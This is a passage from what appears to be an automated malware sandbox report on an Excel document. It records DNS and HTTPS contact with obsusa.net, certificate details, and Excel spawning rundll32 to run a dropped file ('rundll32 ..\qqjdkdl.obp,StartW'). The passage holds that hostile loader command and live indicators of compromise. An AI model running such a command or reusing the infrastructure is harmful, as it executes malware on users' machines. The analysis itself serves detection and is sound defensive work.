              May 4, 2021 10:51:34.260982037 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:34.405467987 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:34.405591011 CEST  49165        443        192.168.2.22    170.249.236.47

              UDP Packets

              Timestamp                            Source Port  Dest Port  Source IP     Dest IP
              May 4, 2021 10:51:31.369769096 CEST  52197        53         192.168.2.22  8.8.8.8
              May 4, 2021 10:51:31.532382965 CEST  53           52197      8.8.8.8       192.168.2.22
              May 4, 2021 10:51:32.459278107 CEST  53099        53         192.168.2.22  8.8.8.8
              May 4, 2021 10:51:32.507986069 CEST  53           53099      8.8.8.8       192.168.2.22
              May 4, 2021 10:51:32.516098976 CEST  52838        53         192.168.2.22  8.8.8.8
              May 4, 2021 10:51:32.569176912 CEST  53           52838      8.8.8.8       192.168.2.22

              DNS Queries

              Timestamp:May 4, 2021 10:51:31.369769096 CEST
              Source IP:192.168.2.22
              Dest IP:8.8.8.8
              Trans ID:0xccae
              OP Code:Standard query (0)
              Name:obsusa.net
              Type:A (IP address)
              Class:IN (0x0001)

              DNS Answers

              Timestamp:May 4, 2021 10:51:31.532382965 CEST
              Source IP:8.8.8.8
              Dest IP:192.168.2.22
              Trans ID:0xccae
              Reply Code:No error (0)
              Name:obsusa.net
              CName:
              Address:170.249.236.47
              Type:A (IP address)
              Class:IN (0x0001)

              HTTPS Packets

              Timestamp:May 4, 2021 10:51:31.889327049 CEST
              Source IP:170.249.236.47
              Source Port:443
              Dest IP:192.168.2.22
              Dest Port:49165
              JA3 SSL Client Fingerprint:771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
              JA3 SSL Client Digest:7dcce5b76c8b17472d024758970a406b

              Certificate chain presented by the server (leaf first):

              Subject:CN=obsusa.net
              Issuer:CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US
              Not Before:Thu Apr 15 02:00:00 CEST 2021
              Not After:Thu Jul 15 01:59:59 CEST 2021

              Subject:CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US
              Issuer:CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB
              Not Before:Mon May 18 02:00:00 CEST 2015
              Not After:Sun May 18 01:59:59 CEST 2025

              Subject:CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB
              Issuer:CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB
              Not Before:Thu Jan 01 01:00:00 CET 2004
              Not After:Mon Jan 01 00:59:59 CET 2029

              Code Manipulations

              System Behavior

              General

              Start time:10:51:43
              Start date:04/05/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13fdf0000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:10:51:51
              Start date:04/05/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\qqjdkdl.obp,StartW
              Imagebase:0xff640000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
